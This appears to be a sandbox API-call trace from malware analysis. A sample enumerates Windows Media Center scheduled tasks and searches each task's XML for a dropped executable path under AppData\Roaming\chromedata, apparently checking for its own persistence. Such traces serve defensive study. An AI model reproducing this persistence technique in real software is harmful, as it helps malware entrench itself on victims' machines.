	[0073.209] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURDiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURDiscovery $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.211] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURDiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURDiscovery $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.211] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.211] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0xb, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.212] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscovery") returned 0x0
	[0073.212] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.213] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.214] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.214] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0xc, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.214] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscoveryW1") returned 0x0
	[0073.214] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW1</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:7 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.216] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW1</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:7 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.216] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.216] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0xd, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.216] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscoveryW2") returned 0x0
	[0073.216] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW2</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:90 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.218] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW2</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:90 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.218] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.219] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0xe, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.219] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="PeriodicScanRetry") returned 0x0
	[0073.219] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemRoot%\\ehome\\ehrecvr.exe,-104)</Source>\r\n    <Date>2008-07-06T05:40:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehrecvr.exe,-103)</Description>\r\n    <URI>\\Microsoft\\Windows\\Media Center\\PeriodicScanRetry</URI>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger id=\"Next Periodic Scan\">\r\n      <StartBoundary>2006-09-09T17:33:00</StartBoundary>\r\n      <Enabled>false</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%windir%\\ehome\\MCUpdate.exe</Command>\r\n      <Arguments>-pscn 0</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.221] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemRoot%\\ehome\\ehrecvr.exe,-104)</Source>\r\n    <Date>2008-07-06T05:40:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehrecvr.exe,-103)</Description>\r\n    <URI>\\Microsoft\\Windows\\Media Center\\PeriodicScanRetry</URI>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger id=\"Next Periodic Scan\">\r\n      <StartBoundary>2006-09-09T17:33:00</StartBoundary>\r\n      <Enabled>false</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%windir%\\ehome\\MCUpdate.exe</Command>\r\n      <Arguments>-pscn 0</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.221] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.221] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0xf, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.221] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="PvrRecoveryTask") returned 0x0
	[0073.221] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-129)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-130)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.223] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-129)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-130)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.223] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.223] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x10, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.223] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="PvrScheduleTask") returned 0x0
	[0073.223] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrScheduleTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-135)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-136)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrSchedule</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{CEF51277-5358-477b-858C-4E14F0C80BF7}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
